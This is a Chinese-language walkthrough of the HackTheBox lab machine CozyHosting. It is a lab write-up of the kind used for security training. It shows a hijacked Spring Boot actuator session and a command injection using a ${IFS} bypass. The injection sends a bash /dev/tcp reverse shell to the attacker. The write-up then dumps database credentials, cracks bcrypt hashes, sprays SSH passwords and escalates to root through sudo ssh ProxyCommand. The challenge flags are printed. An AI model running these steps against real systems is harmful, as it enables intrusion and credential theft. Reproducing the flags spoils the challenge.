HTB：CozyHosting[WriteUP]

连接至HTB服务器并启动靶机

1.How many TCP ports are open on CozyHosting?

2.The webserver on TCP port 80 issues a redirect to what domain?

3.What relative path on the webserver returns a 500 error?

4.What is the Java web framework used in the web application?

5.What endpoint is exposed in Spring Boot and is mainly used for debugging purposes?

6.What is the username of the user's whose session is exposed?

7.When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection?

通过Yakit抓包，修改Cookie值

8.What user is the web application running as?

9.What is the full path to the Java file that runs the web application?

11.What is the admin user's password for the web application?

12.Submit the flag located in the josh user's home directory.

USER_FLAG：6119fa773d0ffd27c4dd189fc0f5d9d5

13.What is the full path of the binary that the josh user can execute on the machine as root?

14.Submit the flag located in the root user's home directory.

ROOT_FLAG：d2d1cf194e12a9002e66e87f61e53579

连接至HTB服务器并启动靶机

靶机IP：10.10.11.230

分配IP：10.10.16.22

1.How many TCP ports are open on CozyHosting?

使用fscan对靶机开放端口进行快速扫描

fscan -nopoc -nobr -no -h {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop]
└─# fscan -nopoc -nobr -no -h 10.10.11.230

   ___                              _
/ _ \     ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_| \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
10.10.11.230:80 open
10.10.11.230:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.230       code:301 len:178    title:301 Moved Permanently 跳转url: http://cozyhosting.htb
已完成 2/2
[*] 扫描结束,耗时: 736.313668ms

由扫描结果可见，靶机开放端口：22、80共2个端口

2.The webserver on TCP port 80 issues a redirect to what domain?

使用curl访问靶机80端口

curl -I http://{TARGET_IP}:80

┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl -I http://10.10.11.230:80
HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 24 Oct 2024 07:41:30 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: http://cozyhosting.htb

由输出可见，访问靶机80端口将被重定向至域名：cozyhosting.htb

3.What relative path on the webserver returns a 500 error?

将IP与域名写入hosts中以便DNS从本地解析

echo "{TAGET_IP} cozyhosting.htb" >> /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat /etc/hosts
127.0.0.1 kali
10.10.11.230 cozyhosting.htb

对该域名进行路径FUZZ

ffuf -u http://cozyhosting.htb/FUZZ -w common.txt

┌──(root㉿kali)-[/home/kali/Desktop/dictionary]
└─# ffuf -u http://cozyhosting.htb/FUZZ -w common.txt

        /'___\ /'___\           /'___\
       /\ \__/ /\ \__/ __ __ /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\ \ \____/ \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

:: Method           : GET
:: URL              : http://cozyhosting.htb/FUZZ
:: Wordlist         : FUZZ: /home/kali/Desktop/dictionary/common.txt
:: Follow redirects : false
:: Calibration      : false
:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 200, Size: 12706, Words: 4263, Lines: 285, Duration: 100ms]
admin                   [Status: 401, Size: 97, Words: 1, Lines: 1, Duration: 95ms]
error                   [Status: 500, Size: 73, Words: 1, Lines: 1, Duration: 80ms]
index                   [Status: 200, Size: 12706, Words: 4263, Lines: 285, Duration: 81ms]
login                   [Status: 200, Size: 4431, Words: 1718, Lines: 97, Duration: 101ms]
logout                  [Status: 204, Size: 0, Words: 1, Lines: 1, Duration: 75ms]
:: Progress: [4614/4614] :: Job [1/1] :: 404 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

由输出可见，相对路径：/error响应状态码为500

4.What is the Java web framework used in the web application?

使用浏览器访问靶机/error目录

对关键字(Whitelabel Error Page)进行搜索，可知该Web使用应用程序为：Spring Boot

5.What endpoint is exposed in Spring Boot and is mainly used for debugging purposes?

已知靶机Web应用程序使用Spring-boot，再次使用对应字典对路径FUZZ

ffuf -u http://cozyhosting.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/spring-boot.txt

由输出可见，/actuator端点下包含着一堆Web配置路径

6.What is the username of the user's whose session is exposed?

使用浏览器访问靶机目录：/actuator/sessions

可见该用户名为：kanderson

7.When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection?

通过上文获取到的sessions文件中的Cookie对/admin路径进行访问

通过Yakit抓包，修改Cookie值

成功进入Admin Dashboard

往下拉可以看到连接设置栏目

本地写一个反弹shell的sh文件，用于靶机访问执行

echo "bash -i >& /dev/tcp/{TARGET_IP}/1425 0>&1" > reverse_shell.sh

靶机访问此反弹shell文件。使用${IFS}绕过Web黑名单对空格的限制

本地nc侧成功收到回显

┌──(root㉿kali)-[/home/kali/Desktop/dictionary]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.230] 46290
bash: cannot set terminal process group (1063): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ whoami
whoami
app

考虑到这里的栏目作用是通过SSH协议连接，所以Username参数位置靠前更危险

8.What user is the web application running as?

通过nc直接执行whoami命令：

┌──(root㉿kali)-[/home/kali/Desktop/dictionary]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.230] 46290
bash: cannot set terminal process group (1063): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ whoami
whoami
app

由回显可见，当前用户为app

9.What is the full path to the Java file that runs the web application?

列出当前目录下所有文件

ls

查看当前目录位置

pwd

由于在本目录下可以找到jar文件，完整路径为：/app/cloudhosting-0.0.1.jar

直接扔给谷歌：application.properties

系统内寻找该文件位置

find / -name 'application.properties' 2>/dev/null

app@cozyhosting:/app$ find / -name 'application.properties' 2>/dev/null
find / -name 'application.properties' 2>/dev/null
/tmp/app/BOOT-INF/classes/application.properties

11.What is the admin user's password for the web application?

查看该Spring-boot相关属性文件内容

cat /tmp/app/BOOT-INF/classes/application.properties

app@cozyhosting:/app$ cat /tmp/app/BOOT-INF/classes/application.properties
cat /tmp/app/BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

结尾处疑似postgresql数据库凭证

用户：postgres

密码：Vg&nvzAQ7XxR

提升tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

尝试在靶机中连接至数据库

psql -h localhost -U postgres

列出所有数据库

\list

连接cozyhosting数据库

\connect cozyhosting

列出表单

\dt

查询users表单中所有列数据

SELECT * FROM users;

我们这里就分别获得了kanderson、admin用户的密码哈希值

admin：$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

kanderson：$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim

查询该哈希值类型

hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
Analyzing '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt

查询hashcat手册可知3200代表bcrypt哈希类型

分别将kanderson、admin用户密码哈希值写入hash1、hash2文件中

echo '$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim' > hash1
echo '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' > hash2

尝试对admin用户哈希文件进行爆破

$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Thu Oct 24 10:34:43 2024 (1 min, 5 secs)
Time.Estimated...: Thu Oct 24 10:35:48 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Desktop/dictionary/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 43 H/s (12.02ms) @ Accel:6 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2808/14344385 (0.02%)
Rejected.........: 0/2808 (0.00%)
Restore.Point....: 2772/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: catcat -> keyboard
Hardware.Mon.#1..: Util: 74%

Started: Thu Oct 24 10:34:36 2024
Stopped: Thu Oct 24 10:35:49 2024

用户：admin

密码：manchesterunited

12.Submit the flag located in the josh user's home directory.

提取出靶机中所有用户的用户名

cut -d: -f 1 /etc/passwd

app@cozyhosting:/app$ cut -d: -f 1 /etc/passwd
cut -d: -f 1 /etc/passwd
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
_apt
systemd-network
systemd-resolve
messagebus
systemd-timesync
pollinate
sshd
syslog
uuidd
tcpdump
tss
landscape
fwupd-refresh
usbmux
lxd
app
postgres
josh
_laurel

攻击机中新建一个文件，并存入用户名

使用美杜莎进行爆破

hydra -L temp.txt -p manchesterunited ssh://{TARGET_IP}

尝试登录josh用户SSH服务

ssh josh@{TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ssh josh@10.10.11.230
The authenticity of host '10.10.11.230 (10.10.11.230)' can't be established.
ED25519 key fingerprint is SHA256:x/7yQ53dizlhq7THoanU79X7U63DSQqSi39NPLqRKHM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.230' (ED25519) to the list of known hosts.
josh@10.10.11.230's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

System information as of Thu Oct 24 02:45:24 PM UTC 2024

System load:           0.0048828125
Usage of /:            56.2% of 5.42GB
Memory usage:          31%
Swap usage:            0%
Processes:             246
Users logged in:       0
IPv4 address for eth0: 10.10.11.230
IPv6 address for eth0: dead:beef::250:56ff:feb9:a52d

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Oct 24 03:20:15 2024 from 10.10.16.16
josh@cozyhosting:~$ whoami
josh

查找一下user_flag位置

find / -name 'user.txt' 2>/dev/null

查看user_flag内容

cat /home/josh/user.txt

josh@cozyhosting:~$ find / -name 'user.txt' 2>/dev/null
/home/josh/user.txt
josh@cozyhosting:~$ cat /home/josh/user.txt
6119fa773d0ffd27c4dd189fc0f5d9d5

USER_FLAG：6119fa773d0ffd27c4dd189fc0f5d9d5

13.What is the full path of the binary that the josh user can execute on the machine as root?

查看一下可以特权运行的文件

sudo -l

josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

该文件完整路径为：/usr/bin/ssh

14.Submit the flag located in the root user's home directory.

直接把ssh文件扔到GTFOBins查询Getshell命令

这里选择第二条，结合实际命令为

sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x

josh@cozyhosting:~$ sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# whoami
root

查找root_flag位置

find / -name 'root.txt'

查看root_flag内容

cat /root/root.txt

# find / -name 'root.txt'
/root/root.txt
# cat /root/root.txt
d2d1cf194e12a9002e66e87f61e53579